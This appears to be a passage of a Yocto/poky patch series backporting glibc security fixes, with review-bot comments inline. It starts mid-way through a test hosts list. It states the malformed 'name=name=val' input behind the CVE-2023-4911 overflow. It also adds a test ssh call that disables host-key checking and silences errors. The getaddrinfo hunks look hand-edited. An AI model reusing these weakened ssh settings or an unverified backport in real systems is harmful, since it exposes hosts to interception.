++192.0.0.34 example.org
++192.0.0.35 example.org
++192.0.0.36 example.org
++192.0.0.37 example.org
++192.0.0.38 example.org
++192.0.0.39 example.org
++192.0.0.40 example.org
++192.0.0.41 example.org
++192.0.0.42 example.org
++192.0.0.43 example.org
++192.0.0.44 example.org
++192.0.0.45 example.org
++192.0.0.46 example.org
++192.0.0.47 example.org
++192.0.0.48 example.org
++192.0.0.49 example.org
++192.0.0.50 example.org
++192.0.0.51 example.org
++192.0.0.52 example.org
++192.0.0.53 example.org
++192.0.0.54 example.org
++192.0.0.55 example.org
++192.0.0.56 example.org
++192.0.0.57 example.org
++192.0.0.58 example.org
++192.0.0.59 example.org
++192.0.0.60 example.org
++192.0.0.61 example.org
++192.0.0.62 example.org
++192.0.0.63 example.org
++192.0.0.64 example.org
++192.0.0.65 example.org
++192.0.0.66 example.org
++192.0.0.67 example.org
++192.0.0.68 example.org
++192.0.0.69 example.org
++192.0.0.70 example.org
++192.0.0.71 example.org
++192.0.0.72 example.org
++192.0.0.73 example.org
++192.0.0.74 example.org
++192.0.0.75 example.org
++192.0.0.76 example.org
++192.0.0.77 example.org
++192.0.0.78 example.org
++192.0.0.79 example.org
++192.0.0.80 example.org
++192.0.0.81 example.org
++192.0.0.82 example.org
++192.0.0.83 example.org
++192.0.0.84 example.org
++192.0.0.85 example.org
++192.0.0.86 example.org
++192.0.0.87 example.org
++192.0.0.88 example.org
++192.0.0.89 example.org
++192.0.0.90 example.org
++192.0.0.91 example.org
++192.0.0.92 example.org
++192.0.0.93 example.org
++192.0.0.94 example.org
++192.0.0.95 example.org
++192.0.0.96 example.org
++192.0.0.97 example.org
++192.0.0.98 example.org
++192.0.0.99 example.org
++192.0.0.100 example.org
++192.0.0.101 example.org
++192.0.0.102 example.org
++192.0.0.103 example.org
++192.0.0.104 example.org
++192.0.0.105 example.org
++192.0.0.106 example.org
++192.0.0.107 example.org
++192.0.0.108 example.org
++192.0.0.109 example.org
++192.0.0.110 example.org
++192.0.0.111 example.org
++192.0.0.112 example.org
++192.0.0.113 example.org
++192.0.0.114 example.org
++192.0.0.115 example.org
++192.0.0.116 example.org
++192.0.0.117 example.org
++192.0.0.118 example.org
++192.0.0.119 example.org
++192.0.0.120 example.org
++192.0.0.121 example.org
++192.0.0.122 example.org
++192.0.0.123 example.org
++192.0.0.124 example.org
++192.0.0.125 example.org
++192.0.0.126 example.org
++192.0.0.127 example.org
++192.0.0.128 example.org
++192.0.0.129 example.org
++192.0.0.130 example.org
++192.0.0.131 example.org
++192.0.0.132 example.org
++192.0.0.133 example.org
++192.0.0.134 example.org
++192.0.0.135 example.org
++192.0.0.136 example.org
++192.0.0.137 example.org
++192.0.0.138 example.org
++192.0.0.139 example.org
++192.0.0.140 example.org
++192.0.0.141 example.org
++192.0.0.142 example.org
++192.0.0.143 example.org
++192.0.0.144 example.org
++192.0.0.145 example.org
++192.0.0.146 example.org
++192.0.0.147 example.org
++192.0.0.148 example.org
++192.0.0.149 example.org
++192.0.0.150 example.org
++192.0.0.151 example.org
++192.0.0.152 example.org
++192.0.0.153 example.org
++192.0.0.154 example.org
++192.0.0.155 example.org
++192.0.0.156 example.org
++192.0.0.157 example.org
++192.0.0.158 example.org
++192.0.0.159 example.org
++192.0.0.160 example.org
++192.0.0.161 example.org
++192.0.0.162 example.org
++192.0.0.163 example.org
++192.0.0.164 example.org
++192.0.0.165 example.org
++192.0.0.166 example.org
++192.0.0.167 example.org
++192.0.0.168 example.org
++192.0.0.169 example.org
++192.0.0.170 example.org
++192.0.0.171 example.org
++192.0.0.172 example.org
++192.0.0.173 example.org
++192.0.0.174 example.org
++192.0.0.175 example.org
++192.0.0.176 example.org
++192.0.0.177 example.org
++192.0.0.178 example.org
++192.0.0.179 example.org
++192.0.0.180 example.org
++192.0.0.181 example.org
++192.0.0.182 example.org
++192.0.0.183 example.org
++192.0.0.184 example.org
++192.0.0.185 example.org
++192.0.0.186 example.org
++192.0.0.187 example.org
++192.0.0.188 example.org
++192.0.0.189 example.org
++192.0.0.190 example.org
++192.0.0.191 example.org
++192.0.0.192 example.org
++192.0.0.193 example.org
++192.0.0.194 example.org
++192.0.0.195 example.org
++192.0.0.196 example.org
++192.0.0.197 example.org
++192.0.0.198 example.org
++192.0.0.199 example.org
++192.0.0.200 example.org
++192.0.0.201 example.org
++192.0.0.202 example.org
++192.0.0.203 example.org
++192.0.0.204 example.org
++192.0.0.205 example.org
++192.0.0.206 example.org
++192.0.0.207 example.org
++192.0.0.208 example.org
++192.0.0.209 example.org
++192.0.0.210 example.org
++192.0.0.211 example.org
++192.0.0.212 example.org
++192.0.0.213 example.org
++192.0.0.214 example.org
++192.0.0.215 example.org
++192.0.0.216 example.org
++192.0.0.217 example.org
++192.0.0.218 example.org
++192.0.0.219 example.org
++192.0.0.220 example.org
++192.0.0.221 example.org
++192.0.0.222 example.org
++192.0.0.223 example.org
++192.0.0.224 example.org
++192.0.0.225 example.org
++192.0.0.226 example.org
++192.0.0.227 example.org
++192.0.0.228 example.org
++192.0.0.229 example.org
++192.0.0.230 example.org
++192.0.0.231 example.org
++192.0.0.232 example.org
++192.0.0.233 example.org
++192.0.0.234 example.org
++192.0.0.235 example.org
++192.0.0.236 example.org
++192.0.0.237 example.org
++192.0.0.238 example.org
++192.0.0.239 example.org
++192.0.0.240 example.org
++192.0.0.241 example.org
++192.0.0.242 example.org
++192.0.0.243 example.org
++192.0.0.244 example.org
++192.0.0.245 example.org
++192.0.0.246 example.org
++192.0.0.247 example.org
++192.0.0.248 example.org
++192.0.0.249 example.org
++192.0.0.250 example.org
++192.0.0.251 example.org
++192.0.0.252 example.org
++192.0.0.253 example.org
++192.0.0.254 example.org
++192.0.1.1 example.org
++192.0.1.2 example.org
++192.0.1.3 example.org
++192.0.1.4 example.org
++192.0.1.5 example.org
++192.0.1.6 example.org
++192.0.1.7 example.org
++192.0.1.8 example.org
++192.0.1.9 example.org
++192.0.1.10 example.org
++192.0.1.11 example.org
++192.0.1.12 example.org
++192.0.1.13 example.org
++192.0.1.14 example.org
++192.0.1.15 example.org
++192.0.1.16 example.org
++192.0.1.17 example.org
++192.0.1.18 example.org
++192.0.1.19 example.org
++192.0.1.20 example.org
++192.0.1.21 example.org
++192.0.1.22 example.org
++192.0.1.23 example.org
++192.0.1.24 example.org
++192.0.1.25 example.org
++192.0.1.26 example.org
++192.0.1.27 example.org
++192.0.1.28 example.org
++192.0.1.29 example.org
++192.0.1.30 example.org
++192.0.1.31 example.org
++192.0.1.32 example.org
++192.0.1.33 example.org
++192.0.1.34 example.org
++192.0.1.35 example.org
++192.0.1.36 example.org
++192.0.1.37 example.org
++192.0.1.38 example.org
++192.0.1.39 example.org
++192.0.1.40 example.org
++192.0.1.41 example.org
++192.0.1.42 example.org
++192.0.1.43 example.org
++192.0.1.44 example.org
++192.0.1.45 example.org
++192.0.1.46 example.org
++192.0.1.47 example.org
++192.0.1.48 example.org
++192.0.1.49 example.org
++192.0.1.50 example.org
++192.0.1.51 example.org
++192.0.1.52 example.org
++192.0.1.53 example.org
++192.0.1.54 example.org
++192.0.1.55 example.org
++192.0.1.56 example.org
++192.0.1.57 example.org
++192.0.1.58 example.org
++192.0.1.59 example.org
++192.0.1.60 example.org
++192.0.1.61 example.org
++192.0.1.62 example.org
++192.0.1.63 example.org
++192.0.1.64 example.org
++192.0.1.65 example.org
++192.0.1.66 example.org
++192.0.1.67 example.org
++192.0.1.68 example.org
++192.0.1.69 example.org
++192.0.1.70 example.org
++192.0.1.71 example.org
++192.0.1.72 example.org
++192.0.1.73 example.org
++192.0.1.74 example.org
++192.0.1.75 example.org
++192.0.1.76 example.org
++192.0.1.77 example.org
++192.0.1.78 example.org
++192.0.1.79 example.org
++192.0.1.80 example.org
++192.0.1.81 example.org
++192.0.1.82 example.org
++192.0.1.83 example.org
++192.0.1.84 example.org
++192.0.1.85 example.org
++192.0.1.86 example.org
++192.0.1.87 example.org
++192.0.1.88 example.org
++192.0.1.89 example.org
++192.0.1.90 example.org
++192.0.1.91 example.org
++192.0.1.92 example.org
++192.0.1.93 example.org
++192.0.1.94 example.org
++192.0.1.95 example.org
++192.0.1.96 example.org
++192.0.1.97 example.org
++192.0.1.98 example.org
++192.0.1.99 example.org
++192.0.1.100 example.org
++192.0.1.101 example.org
++192.0.1.102 example.org
++192.0.1.103 example.org
++192.0.1.104 example.org
++192.0.1.105 example.org
++192.0.1.106 example.org
++192.0.1.107 example.org
++192.0.1.108 example.org
++192.0.1.109 example.org
++192.0.1.110 example.org
++192.0.1.111 example.org
++192.0.1.112 example.org
++192.0.1.113 example.org
++192.0.1.114 example.org
++192.0.1.115 example.org
++192.0.1.116 example.org
++192.0.1.117 example.org
++192.0.1.118 example.org
++192.0.1.119 example.org
++192.0.1.120 example.org
++192.0.1.121 example.org
++192.0.1.122 example.org
++192.0.1.123 example.org
++192.0.1.124 example.org
++192.0.1.125 example.org
++192.0.1.126 example.org
++192.0.1.127 example.org
++192.0.1.128 example.org
++192.0.1.129 example.org
++192.0.1.130 example.org
++192.0.1.131 example.org
++192.0.1.132 example.org
++192.0.1.133 example.org
++192.0.1.134 example.org
++192.0.1.135 example.org
++192.0.1.136 example.org
++192.0.1.137 example.org
++192.0.1.138 example.org
++192.0.1.139 example.org
++192.0.1.140 example.org
++192.0.1.141 example.org
++192.0.1.142 example.org
++192.0.1.143 example.org
++192.0.1.144 example.org
++192.0.1.145 example.org
++192.0.1.146 example.org
++192.0.1.147 example.org
++192.0.1.148 example.org
++192.0.1.149 example.org
++192.0.1.150 example.org
++192.0.1.151 example.org
++192.0.1.152 example.org
++192.0.1.153 example.org
++192.0.1.154 example.org
++192.0.1.155 example.org
++192.0.1.156 example.org
++192.0.1.157 example.org
++192.0.1.158 example.org
++192.0.1.159 example.org
++192.0.1.160 example.org
++192.0.1.161 example.org
++192.0.1.162 example.org
++192.0.1.163 example.org
++192.0.1.164 example.org
++192.0.1.165 example.org
++192.0.1.166 example.org
++192.0.1.167 example.org
++192.0.1.168 example.org
++192.0.1.169 example.org
++192.0.1.170 example.org
++192.0.1.171 example.org
++192.0.1.172 example.org
++192.0.1.173 example.org
++192.0.1.174 example.org
++192.0.1.175 example.org
++192.0.1.176 example.org
++192.0.1.177 example.org
++192.0.1.178 example.org
++192.0.1.179 example.org
++192.0.1.180 example.org
++192.0.1.181 example.org
++192.0.1.182 example.org
++192.0.1.183 example.org
++192.0.1.184 example.org
++192.0.1.185 example.org
++192.0.1.186 example.org
++192.0.1.187 example.org
++192.0.1.188 example.org
++192.0.1.189 example.org
++192.0.1.190 example.org
++192.0.1.191 example.org
++192.0.1.192 example.org
++192.0.1.193 example.org
++192.0.1.194 example.org
++192.0.1.195 example.org
++192.0.1.196 example.org
++192.0.1.197 example.org
++192.0.1.198 example.org
++192.0.1.199 example.org
++192.0.1.200 example.org
++192.0.1.201 example.org
++192.0.1.202 example.org
++192.0.1.203 example.org
++192.0.1.204 example.org
++192.0.1.205 example.org
++192.0.1.206 example.org
++192.0.1.207 example.org
++192.0.1.208 example.org
++192.0.1.209 example.org
++192.0.1.210 example.org
++192.0.1.211 example.org
++192.0.1.212 example.org
++192.0.1.213 example.org
++192.0.1.214 example.org
++192.0.1.215 example.org
++192.0.1.216 example.org
++192.0.1.217 example.org
++192.0.1.218 example.org
++192.0.1.219 example.org
++192.0.1.220 example.org
++192.0.1.221 example.org
++192.0.1.222 example.org
++192.0.1.223 example.org
++192.0.1.224 example.org
++192.0.1.225 example.org
++192.0.1.226 example.org
++192.0.1.227 example.org
++192.0.1.228 example.org
++192.0.1.229 example.org
++192.0.1.230 example.org
++192.0.1.231 example.org
++192.0.1.232 example.org
++192.0.1.233 example.org
++192.0.1.234 example.org
++192.0.1.235 example.org
++192.0.1.236 example.org
++192.0.1.237 example.org
++192.0.1.238 example.org
++192.0.1.239 example.org
++192.0.1.240 example.org
++192.0.1.241 example.org
++192.0.1.242 example.org
++192.0.1.243 example.org
++192.0.1.244 example.org
++192.0.1.245 example.org
++192.0.1.246 example.org
++192.0.1.247 example.org
++192.0.1.248 example.org
++192.0.1.249 example.org
++192.0.1.250 example.org
++192.0.1.251 example.org
++192.0.1.252 example.org
++192.0.1.253 example.org
++192.0.1.254 example.org
+diff --git a/sysdeps/posix/getaddrinfo.c b/sysdeps/posix/getaddrinfo.c
+index 18dccd5924..3d9bea60c6 100644
+--- a/sysdeps/posix/getaddrinfo.c
++++ b/sysdeps/posix/getaddrinfo.c
+@@ -458,11 +458,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ if (name != NULL)
+ {
+- at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
+- at->family = AF_UNSPEC;
+- at->scopeid = 0;
+- at->next = NULL;
+-
+ if (req->ai_flags & AI_IDN)
+ {
+ char *out;
+@@ -473,13 +468,21 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ malloc_name = true;
+ }
+
+- if (__inet_aton_exact (name, (struct in_addr *) at->addr) != 0)
++ uint32_t addr[4];
++ if (__inet_aton_exact (name, (struct in_addr *) addr) != 0)
+ {
++ at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
++ at->scopeid = 0;
++ at->next = NULL;
++
+ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
+- at->family = AF_INET;
++ {
++ memcpy (at->addr, addr, sizeof (at->addr));
++ at->family = AF_INET;
++ }
+ else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
+ {
+- at->addr[3] = at->addr[0];
++ at->addr[3] = addr[0];
+ at->addr[2] = htonl (0xffff);
+ at->addr[1] = 0;
+ at->addr[0] = 0;
+@@ -505,49 +505,62 @@
+
+ if (req->ai_flags & AI_CANONNAME)
+ canon = name;
++
++ goto process_list;
+ }
+- else if (at->family == AF_UNSPEC)
++
++ char *scope_delim = strchr (name, SCOPE_DELIMITER);
++ int e;
++
++ if (scope_delim == NULL)
++ e = inet_pton (AF_INET6, name, addr);
++ else
++ e = __inet_pton_length (AF_INET6, name, scope_delim - name, addr);
++
++ if (e > 0)
+ {
+- char *scope_delim = strchr (name, SCOPE_DELIMITER);
+- int e;
+- if (scope_delim == NULL)
+- e = inet_pton (AF_INET6, name, at->addr);
++ at = alloca_account (sizeof (struct gaih_addrtuple),
++ alloca_used);
++ at->scopeid = 0;
++ at->next = NULL;
++
++ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
++ {
++ memcpy (at->addr, addr, sizeof (at->addr));
++ at->family = AF_INET6;
++ }
++ else if (req->ai_family == AF_INET
++ && IN6_IS_ADDR_V4MAPPED (addr))
++ {
++ at->addr[0] = addr[3];
++ at->addr[1] = addr[1];
++ at->addr[2] = addr[2];
++ at->addr[3] = addr[3];
++ at->family = AF_INET;
++ }
+ else
+- e = __inet_pton_length (AF_INET6, name, scope_delim - name,
+- at->addr);
+- if (e > 0)
+ {
+- if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
+- at->family = AF_INET6;
+- else if (req->ai_family == AF_INET
+- && IN6_IS_ADDR_V4MAPPED (at->addr))
+- {
+- at->addr[0] = at->addr[3];
+- at->family = AF_INET;
+- }
+- else
+- {
+- result = -EAI_ADDRFAMILY;
+- goto free_and_return;
+- }
+-
+- if (scope_delim != NULL
+- && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
+- scope_delim + 1,
+- &at->scopeid) != 0)
+- {
+- result = -EAI_NONAME;
+- goto free_and_return;
+- }
++ result = -EAI_ADDRFAMILY;
++ goto free_and_return;
++ }
+
+- if (req->ai_flags & AI_CANONNAME)
+- canon = name;
++ if (scope_delim != NULL
++ && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
++ scope_delim + 1,
++ &at->scopeid) != 0)
++ {
++ result = -EAI_NONAME;
++ goto free_and_return;
+ }
++
++ if (req->ai_flags & AI_CANONNAME)
++ canon = name;
++
++ goto process_list;
+ }
+
+- if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
++ if ((req->ai_flags & AI_NUMERICHOST) == 0)
+ {
+- struct gaih_addrtuple **pat = &at;
+ int no_data = 0;
+ int no_inet6_data = 0;
+ service_user *nip;
+@@ -543,6 +559,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ enum nss_status status = NSS_STATUS_UNAVAIL;
+ int no_more;
+ struct resolv_context *res_ctx = NULL;
++ bool do_merge = false;
+
+ /* If we do not have to look for IPv6 addresses or the canonical
+ name, use the simple, old functions, which do not support
+@@ -579,7 +596,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ result = -EAI_MEMORY;
+ goto free_and_return;
+ }
+- *pat = addrmem;
++ at = addrmem;
+ }
+ else
+ {
+@@ -632,6 +649,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ }
+
+ struct gaih_addrtuple *addrfree = addrmem;
++ struct gaih_addrtuple **pat = &at;
++
+ for (int i = 0; i < air->naddrs; ++i)
+ {
+ socklen_t size = (air->family[i] == AF_INET
+@@ -695,12 +714,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ free (air);
+
+- if (at->family == AF_UNSPEC)
+- {
+- result = -EAI_NONAME;
+- goto free_and_return;
+- }
+-
+ goto process_list;
+ }
+ else if (err == 0)
+@@ -750,6 +763,22 @@
+
+ while (!no_more)
+ {
++ /* Always start afresh; continue should discard previous results
++ and the hosts database does not support merge. */
++ at = NULL;
++ free (canonbuf);
++ free (addrmem);
++ canon = canonbuf = NULL;
++ addrmem = NULL;
++ got_ipv6 = false;
++
++ if (do_merge)
++ {
++ __set_h_errno (NETDB_INTERNAL);
++ __set_errno (EBUSY);
++ break;
++ }
++
+ no_data = 0;
+ nss_gethostbyname4_r fct4 = NULL;
+
+@@ -744,12 +773,14 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ {
+ while (1)
+ {
+- status = DL_CALL_FCT (fct4, (name, pat,
++ status = DL_CALL_FCT (fct4, (name, &at,
+ tmpbuf->data, tmpbuf->length,
+ &errno, &h_errno,
+ NULL));
+ if (status == NSS_STATUS_SUCCESS)
+ break;
++ /* gethostbyname4_r may write into AT, so reset it. */
++ at = NULL;
+ if (status != NSS_STATUS_TRYAGAIN
+ || errno != ERANGE || h_errno != NETDB_INTERNAL)
+ {
+@@ -774,7 +805,9 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ no_data = 1;
+
+ if ((req->ai_flags & AI_CANONNAME) != 0 && canon == NULL)
+- canon = (*pat)->name;
++ canon = at->name;
++
++ struct gaih_addrtuple **pat = &at;
+
+ while (*pat != NULL)
+ {
+@@ -826,6 +859,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
+
+ if (fct != NULL)
+ {
++ struct gaih_addrtuple **pat = &at;
++
+ if (req->ai_family == AF_INET6
+ || req->ai_family == AF_UNSPEC)
+ {
+@@ -917,6 +946,10 @@
+ if (nss_next_action (nip, status) == NSS_ACTION_RETURN)
+ break;
+
++ /* The hosts database does not support MERGE. */
++ if (nss_next_action (nip, status) == NSS_ACTION_MERGE)
++ do_merge = true;
++
+ if (nip->next == NULL)
+ no_more = -1;
+ else
+@@ -930,7 +969,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
+ }
+
+ process_list:
+- if (at->family == AF_UNSPEC)
++ if (at == NULL)
+ {
+ result = -EAI_NONAME;
+ goto free_and_return;
+--
+2.39.3
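Review bot: The hunk headers for `sysdeps/posix/getaddrinfo.c` are not self-consistent: `@@ -505,49 +505,62 @@` covers old lines up to 553 yet is followed by `@@ -543,6 +559,7 @@`, and `@@ -750,6 +763,22 @@` is followed by `@@ -744,12 +773,14 @@`, with three headers lacking the function context the others carry. That suggests the "Hunks refreshed" step was done by hand, so the patch presumably applies only through patch's offset search. In a rewrite of the allocation handling in `gaih_inet`, a hunk that lands in the wrong place is hard to spot. Regenerating the patch from the recipe's patched source tree and comparing the resulting `getaddrinfo.c` with the upstream commit named in `Upstream-Status` would confirm the backport is faithful.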
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
new file mode 100644
index 0000000000..4d3146509a
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
@@ -0,0 +1,63 @@
+From d2b77337f734fcacdfc8e0ddec14cf31a746c7be Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@redhat.com>
+Date: Mon, 11 Sep 2023 18:53:15 -0400
+Subject: [PATCH v2] tunables: Terminate immediately if end of input is reached
+
+The string parsing routine may end up writing beyond bounds of tunestr
+if the input tunable string is malformed, of the form name=name=val.
+This gets processed twice, first as name=name=val and next as name=val,
+resulting in tunestr being name=name=val:name=val, thus overflowing
+tunestr.
+
+Terminate the parsing loop at the first instance itself so that tunestr
+does not overflow.
+---
+Changes from v1:
+
+- Also null-terminate tunestr before exiting.
+
+ elf/dl-tunables.c | 17 ++++++++++-------
+ 1 file changed, 10 insertions(+), 7 deletions(-)
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2023-4911
+
+diff --git a/elf/dl-tunables.c b/elf/dl-tunables.c
+index 8e7ee9df10..76cf8b9da3 100644
+--- a/elf/dl-tunables.c
++++ b/elf/dl-tunables.c
+@@ -187,11 +187,7 @@ parse_tunables (char *tunestr, char *valstring)
+ /* If we reach the end of the string before getting a valid name-value
+ pair, bail out. */
+ if (p[len] == '\0')
+- {
+- if (__libc_enable_secure)
+- tunestr[off] = '\0';
+- return;
+- }
++ break;
+
+ /* We did not find a valid name-value pair before encountering the
+ colon. */
+@@ -251,9 +247,16 @@ parse_tunables (char *tunestr, char *valstring)
+ }
+ }
+
+- if (p[len] != '\0')
+- p += len + 1;
++ /* We reached the end while processing the tunable string. */
++ if (p[len] == '\0')
++ break;
++
++ p += len + 1;
+ }
++
++ /* Terminate tunestr before we leave. */
++ if (__libc_enable_secure)
++ tunestr[off] = '\0';
+ }
+ #endif
+
+--
+2.41.0
+
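Review bot: The header line `Upstream-Status: Backport [git://sourceware.org/git/glibc.git]` names only the repository, so a reader cannot tell which upstream commit this backport corresponds to or compare the two. No `Signed-off-by:` from whoever adapted the patch for this branch is visible in the added file either. I would pin the commit, e.g. `Upstream-Status: Backport [<upstream commit URL>]`, and add the backporter's sign-off. This matters more than usual here because the changed code runs under `__libc_enable_secure`, where an incomplete backport is hard to spot by reading the recipe alone.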
diff --git a/meta/recipes-core/glibc/glibc/check-test-wrapper b/meta/recipes-core/glibc/glibc/check-test-wrapper
index f8e04e02d2..5cc993f718 100644
--- a/meta/recipes-core/glibc/glibc/check-test-wrapper
+++ b/meta/recipes-core/glibc/glibc/check-test-wrapper
@@ -2,6 +2,7 @@
import sys
import os
import subprocess
+import resource
env = os.environ.copy()
args = sys.argv[1:]
@@ -44,12 +45,20 @@ if targettype == "user":
qemuargs += ["-L", sysroot]
qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))]
command = qemuargs + args
+
+ # We've seen qemu-arm using up all system memory for some glibc
+ # tests e.g. nptl/tst-pthread-timedlock-lockloop
+ # Cap at 8GB since no test should need more than that
+ # (5GB adds 7 failures for qemuarm glibc test run)
+ limit = 8*1024*1024*1024
+ resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
+
elif targettype == "ssh":
host = os.environ.get("SSH_HOST", None)
user = os.environ.get("SSH_HOST_USER", None)
port = os.environ.get("SSH_HOST_PORT", None)
- command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no"]
+ command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no", "-o", "LogLevel=quiet"]
if port:
command += ["-p", str(port)]
if not host:
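Review bot: `resource.setrlimit(resource.RLIMIT_AS, (limit, limit))` raises `ValueError` when the wrapper already runs under a hard address-space limit below 8GB, because an unprivileged process cannot raise its hard limit; that would abort every user-mode test instead of capping it. Clamp to the inherited limit before the existing call: `hard = resource.getrlimit(resource.RLIMIT_AS)[1]` and `if hard != resource.RLIM_INFINITY: limit = min(limit, hard)`. In the ssh branch, adding `LogLevel=quiet` on top of `StrictHostKeyChecking=no` also silences connection and authentication errors, so a failed login is indistinguishable from a failing test; `LogLevel=error` would hide only the known-hosts warning. The `elif targettype == "ssh":` branch continues past the end of the hunk.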
diff --git a/meta/recipes-core/glibc/glibc_2.31.bb b/meta/recipes-core/glibc/glibc_2.31.bb
index 3d486fbb59..296c892994 100644
--- a/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/meta/recipes-core/glibc/glibc_2.31.bb
@@ -1,7 +1,40 @@
require glibc.inc
require glibc-version.inc
-CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752"
+CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752 \
+ CVE-2021-27645 CVE-2021-3326 CVE-2020-27618 CVE-2020-29562 CVE-2019-25013 \
+ CVE-2022-23218 CVE-2022-23219 \
+"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010022
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010023
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010024
+# Upstream glibc maintainers dispute there is any issue and have no plans to address it further.
+# "this is being treated as a non-security bug and no real threat."
+CVE_CHECK_WHITELIST += "CVE-2019-1010022 CVE-2019-1010023 CVE-2019-1010024"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010025
+# Allows for ASLR bypass so can bypass some hardening, not an exploit in itself, may allow
+# easier access for another. "ASLR bypass itself is not a vulnerability."
+# Potential patch at https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+CVE_CHECK_WHITELIST += "CVE-2019-1010025"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35942
+# The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash
+# or read arbitrary memory in parse_param (in posix/wordexp.c) when called with
+# an untrusted, crafted pattern, potentially resulting in a denial of service
+# or disclosure of information. Patch was backported to 2.31 branch already:
+# https://sourceware.org/git/?p=glibc.git;a=commit;h=4f0a61f75385c9a5879cbe7202042e88f692a3c8
+# which is already included in the dunfell branch of poky:
+# https://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?h=dunfell&id=e1e89ff7d75c3d2223f9e3bd875b9b0c5e15836b
+CVE_CHECK_WHITELIST += "CVE-2021-35942"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-4527
+# This vulnerability was introduced in 2.36 by commit
+# f282cdbe7f436c75864e5640a409a10485e9abb2 resolv: Implement no-aaaa stub resolver option
+# so our version is not yet vulnerable
+# See https://sourceware.org/bugzilla/show_bug.cgi?id=30842
+CVE_CHECK_WHITELIST += "CVE-2023-4527"
DEPENDS += "gperf-native bison-native make-native"
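Review bot: The seven CVE ids appended to the first `CVE_CHECK_WHITELIST` line (CVE-2021-27645 through CVE-2022-23219) carry no rationale, while every later entry in this hunk says why it is excluded. A whitelist entry removes the id from the cve-check report, so without a recorded reason nobody can later tell whether the fix is really in the pinned source or the entry only quiets the report. I would add a comment above the line giving, for each id, the commit that carries the fix or the reason it does not apply, in the same form as the CVE-2021-35942 block, e.g. `# CVE-2021-3326: fixed in the pinned glibc source by <commit id>`.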
@@ -41,6 +74,21 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \
file://0028-inject-file-assembly-directives.patch \
file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \
+ file://CVE-2020-29573.patch \
+ file://CVE-2021-33574_1.patch \
+ file://CVE-2021-33574_2.patch \
+ file://CVE-2021-38604.patch \
+ file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \
+ file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \
+ file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \
+ file://0033-elf-Add-test-case-for-BZ-19329.patch \
+ file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \
+ file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \
+ file://CVE-2023-0687.patch \
+ file://CVE-2023-4911.patch \
+ file://CVE-2023-4813.patch \
"
S = "${WORKDIR}/git"
B = "${WORKDIR}/build-${TARGET_SYS}"
diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c7..d1835c7a10 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
return 0;
}
-+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org"
++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
/* Print bug-reporting information in the help message. */
static char *
more_help (int key, const char *text, void *input)
diff --git a/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
new file mode 100644
index 0000000000..e374d8ca59
--- /dev/null
